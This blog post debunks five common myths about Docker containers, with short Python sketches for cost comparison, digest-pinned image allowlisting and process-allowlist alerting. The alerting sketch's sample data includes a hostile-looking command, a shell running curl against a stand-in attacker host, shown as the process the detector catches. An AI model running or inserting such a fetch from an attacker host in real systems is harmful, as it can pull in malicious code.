As you probably know by now, containers are a high-priority topic at companies of all sizes. But there are a lot of myths surrounding this technology as well, in part because it is unfamiliar territory for most, and in part because the technology itself is still so young.
In this post, we’ll debunk five of the most pervasive myths and misunderstandings that surround containers, with a focus on Docker (since it is currently the most widely adopted container technology by a sizeable margin). Let’s dive in.
Myth #1: Docker Is a Panacea
Unfortunately, containers are not a panacea. As we explained in Why Docker Can’t Solve All Your Problems in the Cloud, Docker simply doesn’t do everything. Frankly, it’s better to go into your container journey with reasonable expectations about what you can achieve, so viewing Docker as a one-size-fits-all solution isn’t particularly helpful.
If you’re considering adopting Docker to containerize something specific in your platform, that’s a better place to start. Then you can ask yourself: Where are you today in your platform evolution? If you have small software services already broken out, you’re in a good position to get going with Docker and to use it to solve small, specific problems vs. trying to cure every ill.
When it comes to assessing whether your environment is in a good place to start testing containers, the metaphor we often use is cattle vs. pets. To be in a good position to move to containers, you need to be able to treat your environment like cattle, not pets. If you have a high-touch, intensive routine and are continually grooming your servers, you may not be well-equipped to move to containers. On the other hand, if you have a lot of cattle already — i.e., small microservices — and you treat them as such, you may be in a good position to move to containers.
If you already have a collection of things that are well-scoped and loosely coupled, good on you, and containers may very well solve some problems for you. But if you already have a load of process challenges and your approach to application management is very hands-on, you may want to address those issues before you try to move to Docker. You really need to be committed to the concept and practices around immutable infrastructure before you make the leap to containers.
Myth #2: Docker Has a Clear Set of Best Practices...HA!
As with any groundbreaking technology that’s in the rapid-adoption phase of its lifecycle, containers do not yet have a clear set of best practices. Everyone is still figuring out what best practices should look like as they go along — us included! (Let’s be honest.)
While there aren’t cut-and-dried best practices, we do have a pretty good idea at this point about what not to do — just not quite as much about what to do. For example, early on, the thinking went that you didn’t want to host a database in Docker. But now people are running entire search engines (a.k.a. huge databases) in Docker and figuring out ways to make it work. Ivory tower conventional wisdom is being challenged left and right.
It’s OK that the Docker world is full of turbulence right now, but that doesn’t necessarily mean you should steer clear. Just make sure you understand (as well as you can) what you’re getting yourself into.
Taking that one step further, don’t be afraid to try different things and see what works for you. If you can think through the problems you want to solve and clearly define a few experiments, you can probably learn a lot about what is appropriate for your organization. The lack of best practices can be challenging, yes, but it can also be freeing, because it encourages all of us to think outside the box and come up with creative solutions to age-old problems.
Myth #3: Docker Is Always Cheaper Than Virtual Machines
Again, not so fast. From a certain angle, it may seem reasonable to estimate that running containers would be cheaper than virtual machines. After all, if you have 600 AWS instances with 1 CPU and 4–5 GB of RAM each, perhaps you could use Docker containers to consolidate that to 100 instances with 32 CPUs and 64 GB of RAM each. Then you could significantly reduce your AWS costs, since you’ll have fewer instances, right?
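It's worth actually doing the aggregate math before assuming consolidation saves money. The sketch below compares the two hypothetical fleets; the per-instance prices are made-up placeholders for illustration, not real AWS rates, and real savings depend on actual utilization, not instance counts alone.

```python
# Rough capacity/cost comparison for the consolidation example above.
# All hourly prices are hypothetical placeholders, not real AWS rates.

def fleet_totals(count, cpus, ram_gb, hourly_price):
    """Return aggregate vCPUs, RAM, and monthly cost for a fleet."""
    hours_per_month = 730
    return {
        "vcpus": count * cpus,
        "ram_gb": count * ram_gb,
        "monthly_cost": count * hourly_price * hours_per_month,
    }

# 600 small instances: 1 vCPU, ~4.5 GB RAM each (hypothetical $0.05/hr)
small_fleet = fleet_totals(600, 1, 4.5, 0.05)

# 100 large instances: 32 vCPUs, 64 GB RAM each (hypothetical $1.50/hr)
large_fleet = fleet_totals(100, 32, 64, 1.50)

print(small_fleet)  # 600 vCPUs, 2700.0 GB RAM total
print(large_fleet)  # 3200 vCPUs, 6400 GB RAM total

# Note that the consolidated fleet provisions far more CPU and RAM than
# the small fleet ever had, and at these placeholder prices its raw bill
# is higher, not lower. Fewer instances does not automatically mean less
# spend; you have to size against real utilization.
```

Even before you add the cost of an orchestration platform, the raw instance math can cut against you if the new fleet is oversized.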
That might work for some use cases, at least for a short period of time. But in the longer term, like any other technology trade-off, you’re swapping a certain set of complexities for new ones. And in this case, those new complexities come with a price tag.
For example, when you start running containers at scale, you’ll have to invest in a management and orchestration platform that can manage your containers and their resources. That will require a whole new tech stack. And since there aren’t clear best practices (see Myth #2), you’ll have to accept some trial-and-error (read: lost time and money) along the way.
The math isn’t simple and clear cut, so you want to spend a good chunk of time scoping out your priorities and understanding what it will really cost to switch to containers (and then adding a healthy cushion to that) before you make the leap.
Myth #4: Containers Can Act Like Virtual Machines
Containers aren’t just smaller, more discrete virtual machines. They are a completely separate species. So if you’re using containers like you’re using VMs — or if you’re planning to build a VM in a Docker container — it’s time to take a step back. That would indicate a fundamental misunderstanding that can lead to some major issues.
We encourage folks to think about Docker kind of like a little 3D printer. You input your requirements, and poof! A container appears. Now, this is a whole and self-contained object, and it’s not one you can edit or chip away at (hence the term immutable). If something isn’t quite right or you need a new one, you’ll have to toss it, go back to the printer, and print out a new one.
Make sure that when you make the move to Docker, you are also making the mental and cultural shift to treat containers as a different beast altogether. Ask yourself questions like:
- What does containerizing our app truly mean?
- Do we understand the dependencies?
If you can answer questions like these and build a new workflow that is tailored to containers, then you’ll be well on your way to realizing the benefits.
Myth #5: Docker Has the Same Security Model as Virtual Machines
Many people deploy Docker thinking it has the same security model as virtual machines. Unfortunately, this could not be further from the truth. We like to say that a Docker container is like a ghost of an OS. It is related to an operating system, but it’s not an operating system. Many teams run their containers on a scaled-back operating system such as CoreOS, which frankly can’t do much except run Docker.
Part of the issue is that apps generally still need some of the things a more traditional OS provides. For example, let’s say you build a container from a well-known Linux distribution like Ubuntu. Now your app may feel like it has everything it would need, just as if it were running in Ubuntu. But now let’s say some of your users are pulling down preconfigured Docker images to save time. Do you know where those images are coming from? What’s in them? And by the way, no one’s logging into your Docker containers directly, right?
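One concrete mitigation for the "where did that image come from?" problem is to pin approved images by digest rather than by mutable tag, and reject anything that isn't on the list. A minimal sketch of that check — the image names and digests below are made up for illustration:

```python
# Sketch: accept only image references pinned to an approved digest.
# The allowlist entries here are hypothetical, not real digests.

def parse_image_ref(ref):
    """Split 'name@sha256:...' into (name, digest); digest is None for tag refs."""
    if "@" in ref:
        name, digest = ref.split("@", 1)
        return name, digest
    return ref, None

def is_approved(ref, allowlist):
    """An image passes only if it is pinned to a digest we have approved."""
    name, digest = parse_image_ref(ref)
    return digest is not None and allowlist.get(name) == digest

# Hypothetical allowlist: image name -> approved digest (placeholder value)
ALLOWLIST = {"ubuntu": "sha256:0123abcd"}

print(is_approved("ubuntu@sha256:0123abcd", ALLOWLIST))  # pinned and known
print(is_approved("ubuntu:latest", ALLOWLIST))           # mutable tag: rejected
print(is_approved("ubuntu@sha256:deadbeef", ALLOWLIST))  # unknown digest: rejected
```

A digest-pinned reference always resolves to the same image content, which is exactly the property a mutable tag like `latest` doesn’t give you.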
As you can see, a whole new set of security challenges crops up when you move to containers.
Some of these challenges have arisen because the original goal of “one process, one container” has proven fairly difficult to put into practice. So people have looked for shortcuts and ways around what is actually a pretty essential principle of containers.
If you hack your way to a containerized environment, you’ll need to build in alerts when something happens that could indicate a security issue. For example, if you build a series of containers to run a Java app, you should get an alert if anything other than Java starts running.
The good news is that containers allow you to get really specific about these types of alerts. You can scope down what you are looking for. But the challenge comes in writing these rules, applying them, and managing them over time.
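For the Java example above, the alerting rule boils down to an allowlist check over the processes visible in a container (gathered, for instance, from `docker top` or by reading `/proc`). A hypothetical sketch of just the matching logic:

```python
# Sketch: flag any container process not on the expected allowlist.
# The process snapshot below is a hypothetical example, not real output.

def unexpected_processes(running, allowed_prefixes):
    """Return commands that don't start with any allowed prefix."""
    return [
        cmd for cmd in running
        if not any(cmd.startswith(prefix) for prefix in allowed_prefixes)
    ]

# A container built to run only a Java app:
allowed = ("java",)

# Hypothetical process list, e.g. parsed from `docker top <container>`:
snapshot = ["java -jar app.jar", "sh -c curl http://evil.example"]

violations = unexpected_processes(snapshot, allowed)
if violations:
    print("ALERT: unexpected processes:", violations)
```

Because a single-purpose container should only ever run one kind of process, the rule can be this narrow — the hard part, as noted above, is writing, applying, and maintaining such rules across a whole fleet.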
Don’t Give Up on Docker
Containers are a cool new technology with lots of potential, and in our view, it’s well worth figuring out how Docker fits into your overall strategy. But it’s also good to approach it with open eyes and to make sure you aren’t trying to fit a square peg into a round hole. Understanding the myths that surround containers and making sure you have a clearly defined goal for how you will use them will go a long way toward helping you avoid some of the most common pitfalls.
If you’d like to learn more about what you should consider before moving to containers, have a look at our recent post on Why Docker Can’t Solve All Your Problems in the Cloud.